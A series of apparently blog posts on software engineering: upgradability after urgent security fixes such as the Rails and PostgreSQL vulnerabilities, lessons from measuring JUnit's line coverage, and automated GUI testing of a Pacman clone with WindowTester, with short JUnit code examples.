  1. Isolation of depedencies on the external components, for example through the use of wrappers or aspects in order to reduce the impact of incompatibilities.

  2. Dependency hygiene, ensuring the newest versions of external components are used as soon as they are available (which is good security policy anyway). This helps avoid the accumulation of incompatibilities, which may cause updates to take weeks rather than minutes (or even hours). Hot security fixes may even be unavailable for older versions: For Ruby on Rails, which is now in version 3.x, the most popular comment at the fix site was a telling “lots of love from people stuck on 2.3

  3. Test automation, in order to reduce the execution time of regression tests for the system working with the upgraded component. This will include end-to-end system tests, but can also include dedicated tests ensuring that the wrappers built meet the behavior expected from the component.

  4. Continuous deployment, ensuring that once the source code can deal with the upgraded library, the actual system can be deployed with a push on the button.

None of these comes for free. In other words, the product owner should be willing to invest in these. It is the responsibility of the architect to make clear what the costs and benefits are, and what the risks are of not investing in isolation, dependency hygiene, test automation, and continuous deployment. In this explanation, the architect can point to additional benefits, such as better maintainability, but these may be harder to sell than security and availability.

This brings me to two research connections of this case.

The first relates to regression testing. A hot fix for a system that is down is a case where it actually matters how long the execution of an (automated) regression test suite takes: test execution time in this case equals down time. Intuitively, test cases covering functionality for which Rails is not even used, need not be executed. This is where the research area of selective regression testing comes in. The typical technique uses control flow analysis in order to reduce a large regression test suite given a particular change. This is classic software engineering research dating back to the 90s: For a representative article have a look at Rothermel and Harrold’s Safe, Efficient Regression Test Selection Technique.

Design for upgradability also relates to some of the research I’m involved in.
What an architect caring about upgradability can do is estimate the anticipated upgrading costs of an external component. This could be based on a library’s “compatibility reputation”. But how can we create such a compatibility rating?

At the time of writing, we are working on various metrics that use a library’s release history in order to predict API stability. We are using the (huge) maven repository to learn about breaking changes in libraries in the wild, and we are investigating to what extent encapsulation practices are effective. With that in place, we hope to be able to provide decision support concerning the maintainability costs of using third party libraries.

For our first results, have a look at our ICSM 2012 paper on Measuring Library Stability Through Historical Version Analysis — for the rest, stay tuned, as there is more to come.

EDIT (February 4, 2013)

For a more detailed account of the impact of the Rails vulnerabilites, have a look at What The Rails Security Issue Means For Your Startup by Patrick McKenzie. The many (sometimes critical) comments on that post are also an indication for how hard upgrading in practice is (“How does this help me … when I have a multitude of apps running some Rails 1.x or 2.x version?“).

An interesting connection with API design is provided by Ned Batchelder, who suggests to rename .load and .safe_load to .dangerous_load and .load, respectively (in a Python setting in which similar security issues exist).

EDIT (April 4, 2013)

As another (separate) example of an urgent security fix, today (April 4, 2013), the PostgreSQL Global Development Group has released a security update to all current versions of the PostgreSQL database system. The most important security issue fixed in this release, CVE-2013-1899, makes it possible for a connection request containing a database name that begins with “-” to be crafted that can damage or destroy files within a server’s data directory.

Here again, all users of the affected versions are strongly urged to apply the update immediately, illustrating once more the need to be able to upgrade rapidly.

Line Coverage: Lessons from JUnit

In unit testing, achieving 100% statement coverage is not realistic. But what percentage would good testers get? Which cases are typically not included? Is it important to actually measure coverage?

To answer questions like these, I took a look at the test suite of JUnit itself. This is an interesting case, since it is created by some of the best developers around the world, who care a about testing. If they decide not to test a given case, what can we learn from that?

Coverage of JUnit as measured by Cobertura

Coverage of JUnit as measured by Cobertura

Overall Coverage at First Sight

Applying Cobertura to the 600+ test cases of JUnit leads to the results shown above (I used the maven-enabled version of JUnit 4.11). Overall, instruction coverage is almost 85%. In total, JUnit comprises around 13,000 lines of code and 15,000 lines of test code (both counted with wc). Thus, the test suite that is larger than the framework, leaves around 15% of the code untouched.

Covering Deprecated Code?

A first finding is that in JUnit coverage of deprecated code tends be to be lower. Junit 4.11 contains 13 deprecated classes (more than 10% of the code base), which achieve only 65% line coverage.

JUnit includes another dozen or so deprecated methods spread over different classes. These tend to be small methods (just forwarding a call), which often are not tested.

Furthermore, JUnit 4.11 includes both the modern org.junit.* packages as well as the older junit.* packages from 3.8.x. These older packages constitute ~20% of the code base. Their coverage is 70%, whereas the newer packages have a coverage of almost 90%.

This lower coverage for deprecated code is somewhat surprising, since in a test-driven development process you would expect good coverage of code before it gets deprecated. The underlying mechanism may be that after deprecation there is no incentive to maintain the test cases: If I would issue a ticket to improve the test cases for a deprecated method on JUnit I suspect this issue would not get a high priority. (This calls for some repository mining research on deprecation and testing, in the spirit of our work on co-evolution of tests and code).

Another implication is that when configuring coverage tools, it may be worth excluding deprecated code from analysis. A coverage tool that can recognize @Deprecated tags would be ideal, but I am not aware of such a tool. If excluding deprecated code is impossible, an option is to adjust coverage warning thresholds in your continuous integration tools: For projects rich in deprecated code it will be harder to maintain high coverage percentages.

Ignoring deprecated code, the JUnit coverage is 93%.

An Untested Class!

In the non-deprecated code, there was one class not covered by any test:
runners.model.NoGenericTypeParametersValidator. This class validates that @Theories are not applied to generic types (which are problematic due to type erasure).

I easily found the pull request introducing the validator about a year ago. Interestingly, the pull request included a test class clearly aimed at testing the new validator. What happened?

  • Tests in JUnit are executed via @Suites. The new test class, however, was not added to any suite, and hence not executed.
  • Once added to the proper suite, it turned out the new tests failed: the new validation code was never actually invoked.

I posted a comment on the (already closed) pull request. The original developer responded quickly, and provided a fix for the code and the tests within a day.

Note that finding this issue through coverage thresholds in a continuous integration server may not be so easy. The pull request in question causes a 1% increase in code size, and a 1% decrease in coverage. Alerts based on thresholds need to be sensitive to small changes like these. (And, the current ant-based Cloudbees JUnit continuous integration server does not monitor coverage at all).

What I’d really want is continuous integration alerts based on coverage deltas for the files modified in the pull request only. I am, however, not aware of tools supporting this at the moment.

The Usual Suspects: 6%.

To understand the final 5-6% of uncovered code, I had a look at the remaining classes. For those, there was not a single method with more than 2 or 3 uncovered lines. For this uncovered code, various typical categories can be distinguished.

First, there is the category too simple to test. Here is an example from org.junit.Assume, in which an assumeTrue is turned into an assumeFalse by just adding a negation operator:

public static void assumeFalse(boolean b) {
  assumeTrue(!b);
}

Other instances of too simple to test include basic getters, or overrides for methods such as toString.

A special case of too simple to test is the empty method. These are typically used to provide (or override) default behavior in inheritance hierarchies:

/**
 * Override to set up your specific external resource.
 *
 * @throws if setup fails (which will disable {@code after}
 */
protected void before() throws Throwable {
    // do nothing
}

Another category is code that is dead by design. An example is a static only class, which need not be instantiated. It is good Java practice (adopted selectively in JUnit too) to make this explicit by declaring the constructor private:

/**
 * Protect constructor since it is a static only class
 */
protected Assert() {
}

In other cases dead by design involves an assertion that certain situations will never occur. An example is Request.java:

catch (InitializationError e) {
  throw new RuntimeException(
    "Bug in saff's brain: " +
    "Suite constructor, called as above, should always complete");
}

This is similar to a default case in a switch statement that can never be reached.

A final category consists of bad weather behavior that is unlikely to happen. This typically manifests itself in not explicitly testing that certain exceptions are caught:

try {
  ...
} catch (InitializationError e) {
  return new ErrorReportingRunner(null, e);
}

Here the catch clause is not covered by any test. Similar cases occur for example when raising an illegal argument exception if inputs do not meet simple validation criteria.

EclEmma and JaCoCo

While all of the above is based on Cobertura, I started out using EclEmma/Jacoco 0.6.0 in Eclipse for doing the coverage analysis. There were two (small) surprises.

First, merely enabling EclEmma code coverage caused the JUnit test suite to fail. The issue at hand is that in JUnit test methods can be sorted according to different criteria. This involves reflection, and the test outcomes were influenced by additional (synthetic) methods generated by Jacoco. The solution is to configure Jacoco so that instrumentation of certain classes is disabled — or to make the JUnit test suite more robust against instrumentation.

Second, JaCoCo does not report coverage of code raising exceptions. In contrast to Cobertura, JaCoCo does on-the-fly instrumentation using an agent attached to the Java class loader. Instructions in blocks that are not completed due to an exception are not reported as being covered.

As a consequence, JaCoCo is not suitable for exception-intensive code. JUnit, however, is rich in exceptions, for example in the various Assert methods. Consequently, the code coverage for JUnit reported by JaCoCo is around 3% lower than by Cobertura.

Lessons Learned

Applying line coverage to one of the best tested projects in the world, here is what we learned:

  1. Carefully analyzing coverage of code affected by your pull request is more useful than monitoring overall coverage trends against thresholds.
  2. It may be OK to lower your testing standards for deprecated code, but do not let this affect the rest of the code. If you use coverage thresholds on a continuous integration server,  consider setting them differently for deprecated code.
  3. There is no reason to have methods with more than 2-3 untested lines of code.
  4. The usual suspects (simple code, dead code, bad weather behavior, …) correspond to around 5% of uncovered code.

In summary, should you monitor line coverage? Not all development teams do, and even in the JUnit project it does not seem to be a standard practice. However, if you want to be as good as the JUnit developers, there is no reason why your line coverage would be below 95%. And monitoring coverage is a simple first step to verify just that.

Automated GUI Testing with Google’s WindowTester

One of the topics that popped up a couple of times in our “test confession” interviews with Eclipse developers, is the tension between unit testing and GUI testing. Does an application with a thorough unit test suite require user interface testing? And what about the other way around? What does automated GUI testing add to standard unit testing? Is automated GUI testing a way to involve the end-users in the testing process?

wintester-recorder

In order to fully understand all arguments, I decided to play around a little with WindowTester, a capture-and-playback automated GUI testing tool made available by Google, with support for Swing and SWT.

My case study is JPacman, a Java implementation of a game similar to Pacman I use for teaching software testing. The plan of attack is simple: take the existing use cases, turn each into a click trail, record the trail, and generate a (JUnit-based) test suite.

My first use case is simple: enter and exit the game. To that end, I open the recorder, launch pacman, and press the red "Record" button in Eclipse. Then I press the start button in the game, followed by the exit button, which quits the application. WindowTester then prompts for the place to save this interaction:

save-testcase

After that, WindowTester generates the following JUnit test case:

public class StartAndExitUseCase extends UITestCaseSwing {

    import ...

    public StartAndExitUseCase() {
        super(jpacman.controller.Pacman.class);
    }

    public void testStartAndExitUseCase() throws Exception {
        IUIContext ui = getUI();
        ui.click(new JButtonLocator("Start"));
        ui.click(new JButtonLocator("Exit"));
        ui.wait(new WindowDisposedCondition("JPacman"));
    }
}

The next use case requires me to make moves in several directions.
Unfortunately, WindowTester can’t record arrow keys. To resolve this, I decide to modify Jpacman to use good old vi-navigation (‘hjkl’).

I then open JPacman, to make moves in all directions. Unfortunately, I’m a bit slow, and I bump into one of the randomly moving monsters, after which I die.

This is a deeper issue: Parts of the application, in particular the random monsters, cannot be controlled via the GUI. Without such control, it is impossible to have test cases with reproducible results.

My solution is to create a slightly different version of Pacman, in which the monsters don’t move at all. In fact, I happened to have the code for this ready already in my test harness, as I used such a version for doing unit testing.

This works, and the result is a test case passing just fine:

public void testSimpleMove() throws Exception {
    IUIContext ui = getUI();
    ui.click(new JButtonLocator("Start"));
    ui.enterText("jlkhhh");
}

The test doesn’t assert much, though. Luckily, WindowTester has a mechanism to insert “hooks” while recording, prompting me for a name of the method to be called.

hook

This results in the following code:

public void testSimpleMoveWithAsserts() throws Exception {
    IUIContext ui = getUI();
    ui.click(new JButtonLocator("Start"));
    ui.enterText("l");
    assertCorrectMoveToTheLeft();
    ui.enterText("j");
    assertCorrectMoveDown();
}

protected void assertCorrectMoveDown() throws Exception {
    // TODO Auto-generated method stub
}
...

WindowTester generates empty bodies for the two assert methods, leaving it to the developer to insert appropriate code. This raises two issues.

The first is that the natural way (at least for me as a tester) to verify that a move down was conducted correctly is to ask the position of the player to the appropriate objects. But from the GUI, I don’t have access to these. My work around is to adjust Pacman’s “main” method, to make the underlying model available through a static reference. This results in the following code:

protected void assertCorrectMoveDown() {
    Pacman pm = SimplePacman.instance();
    assertEquals(1, pm.getEngine().getPlayer().getLastDy());
}

Writing such an assertion requires good knowledge of the underlying API, and a bit of luck that the API exposes a method to witness the desired effect.

My next use case involves a hungry Pacman consuming a dot, which earns the player 10 points. Doing this in a way similar to the previous use case iss simple enough. Would it also be possible to assert that the proper number of points are displayed correctly in the GUI? This requires getting hold of the appropriate JTextField, and checking its content before and after eating a dot.

To support this, WindowTester offers a number of widget locators. An example is the locator used above to find a JButton labeled with “Start”. Other types of locators make use of patterns, the hierarchical position in the GUI, or a unique name that a developer can give to widgets. I use this latter option, allowing me to retrieve the points displayed as follows:

private int getPointsDisplayed() throws WidgetSearchException {
    WidgetReference<JTextField> wrf = 
        (WidgetReference<JTextField>) 
        getUI().find(new NamedWidgetLocator("jpacman.points"));
    JTextField pointsField = (JTextField) wrf.getWidget();
    return Integer.parseInt(pointsField.getText());
}

Thus, I can test if the points actually displayed are correct.

The remaining use cases can be handled in a similar way. Some use cases require moving monsters, for which having access to the GUI alone is not enough. Another use case, winning the game, would require a lot of clever moves on the regular board: instead I create a custom small and simple board, in which winning is easy.

I less and less make use of the recording capabilities of WindowTester: instead I directly program against its API. This also helps me to make the test cases easier maintainable: I have a “setUp” for pushing the “Start” button, a “tearDown” for pushing “Exit”, and I can make use of other JUnit best practices. Moreover, it allows me to create a small layer of methods permitting more abstract test cases, such as the method above to obtain the actual points displayed.

Are the resulting test cases useful? I recently changed some of the GUI logic, turning a complex if-then-else to handle keyboard events into a much cleaner switch statement (inspired by a warning PMD was giving me). All unit test cases passed fine. I almost committed, but then decided to run the GUI test suite as well. It failed. I first blamed WindowTester, but then I realized it was my own fault: I had forgotten some breaks in my switch and the events were not handled correctly. The GUI test suite found a fault my unit test suite had not found.

In summary, automated GUI testing is neither a replacement for unit nor for acceptance testing. It is a useful tool for covering the GUI logic of your application. The recording capabilities can be helpful to try out certain scenarios. In the end, however an explicitly programmed test suite, making use of the GUI framework’s API, seems easier to maintain. In this way, JUnit best practices related to test suite organization as well as the application’s observability and controllability can be directly applied to your GUI test suite as well.


(This is post originally appeared February 2011 as “Swinging Test Suites with WindowTester” on the Eclipse Study blog)